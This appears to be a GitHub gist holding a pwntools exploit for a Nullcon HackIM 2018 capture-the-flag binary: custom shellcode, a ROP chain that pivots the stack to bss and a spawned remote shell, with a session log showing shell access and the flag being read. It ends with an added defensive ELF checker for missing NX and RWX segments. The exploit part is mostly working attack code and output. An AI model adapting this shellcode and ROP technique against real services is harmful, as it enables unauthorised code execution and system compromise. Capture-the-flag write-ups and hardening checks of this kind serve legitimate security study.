@dialluvioso
Created February 11, 2018 14:45
Nullcon HackIM 2018 - Exploitation Question 2 (300 points)
from pwn import *

local = False
binary = ELF('./pwn2-box.bin')
context.arch = 'amd64'
p = process('./pwn2-box.bin') if local else remote('35.170.14.27', 9002)

# Custom shellcode using allowed seccomp sandbox syscalls to communicate with the child process:
# write(6, buf, 255), where buf is whatever follows the trailing `call` below. The leading
# `pop rsi` takes the return address that `call` pushed, so rsi points right after it.
shellcode = asm('''
pop rsi
xor rdx, rdx
mov dl, 255
xor rdi, rdi
mov dil, 0x06
mov al, 0x01
syscall
''')
# `call` back to the start of the shellcode; the rel32 is auto-adjusted to the shellcode length
shellcode += '\xe8' + p32(0x100000000 - (len(shellcode) + 5))

stager = ''
stager += '\xeb' + chr(len(shellcode) - 5) # jmp short to the trailing `call`
stager += shellcode
stager += '\x0a'
stager += p32(0x200) * (116//4) # padding up to the saved rbp
stager += p64(binary.bss()) # saved rbp -> bss (consumed by the `leave; ret` below)
rop_chain = [
p64(0x400eb3), # pop rdi; ret;
p64(0x0), # stdin
p64(0x400eb1), # pop rsi; pop r15; ret;
p64(binary.bss() + 8), # rsi: read() destination, becomes the new stack
p64(0x0), # r15 (unused)
p64(binary.symbols['read']), # read @ plt
p64(0x400aee) # leave; ret; pivots rsp to bss and returns into [bss + 8]
]
stager += bytearray(''.join(rop_chain))
p.send(chr(len(stager))) # the binary reads a length byte first, then that many bytes
p.send(stager)

# Second stage, read() into bss + 8: the address that `leave; ret` returns to (bss + 0x10),
# followed by the shellcode that lands there.
stack_pivot = p64(binary.bss() + 0x10)
stack_pivot += asm(shellcraft.linux.sh())
p.send(stack_pivot)
p.interactive()

# Session output of the run above:
'''
[*] 'pwn2-box.bin'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[+] Opening connection to 35.170.14.27 on port 9002: Done
[*] Switching to interactive mode
$ id
uid=1000(bob) gid=1000(bob) groups=1000(bob)
$ cat /flag.txt
hackim18{'878425AC-D970-4E7B-95C6-D2E5E23A1BC2'}
'''
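The checksec lines in the session above (NX disabled, RWX segments) are what let the stager and the shellcode execute from the bss. As an added example that is not part of the gist, the following parser reads the ELF64 program headers and reproduces those two verdicts so a build pipeline can reject such binaries before they ship; the two images it checks are constructed inline and stand in for real files.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474e551
PF_X, PF_W, PF_R = 1, 2, 4
RWX = PF_R | PF_W | PF_X
PHDR_FMT = '<IIQQQQQQ'  # Elf64_Phdr: p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align

def parse_phdrs(data):
    """Return the program headers of a little-endian ELF64 image as dicts."""
    if data[:4] != b'\x7fELF' or data[4] != 2 or data[5] != 1:
        raise ValueError('not a little-endian ELF64 image')
    e_phoff, = struct.unpack_from('<Q', data, 0x20)               # e_phoff sits at offset 32
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 0x36)  # e_phentsize, e_phnum at 54
    names = ('type', 'flags', 'offset', 'vaddr', 'paddr', 'filesz', 'memsz', 'align')
    return [dict(zip(names, struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)))
            for i in range(e_phnum)]

def checksec_memory(data):
    """Reproduce the NX / RWX verdicts: NX counts as enabled only when a PT_GNU_STACK header
    is present and lacks PF_X (a missing header is treated as no NX, conservatively);
    every PT_LOAD segment mapped readable, writable and executable is reported."""
    phdrs = parse_phdrs(data)
    stack = [p for p in phdrs if p['type'] == PT_GNU_STACK]
    nx = bool(stack) and not (stack[0]['flags'] & PF_X)
    rwx = [hex(p['vaddr']) for p in phdrs if p['type'] == PT_LOAD and (p['flags'] & RWX) == RWX]
    return {'nx': nx, 'rwx_segments': rwx}

def build_elf(phdrs):
    """Assemble a minimal ELF64 image (headers only, not runnable) from (p_type, p_flags, p_vaddr)
    tuples. Constructed test input; a real check would read the file from disk instead."""
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + bytes(8)  # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    ehdr = ident + struct.pack('<HHIQQQIHHHHHH', 2, 62, 1, 0x400000, 64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b''.join(struct.pack(PHDR_FMT, t, f, 0, va, va, 0x1000, 0x1000, 0x1000) for t, f, va in phdrs)
    return ehdr + body

# Constructed images: one laid out like the challenge binary (RWX text, executable stack),
# one with the usual split mappings and a non-executable stack.
WEAK = build_elf([(PT_LOAD, RWX, 0x400000), (PT_GNU_STACK, RWX, 0)])
HARDENED = build_elf([(PT_LOAD, PF_R | PF_X, 0x400000), (PT_LOAD, PF_R | PF_W, 0x601000),
                      (PT_GNU_STACK, PF_R | PF_W, 0)])

if __name__ == '__main__':
    for name, img in (('weak', WEAK), ('hardened', HARDENED)):
        print(name, checksec_memory(img))
```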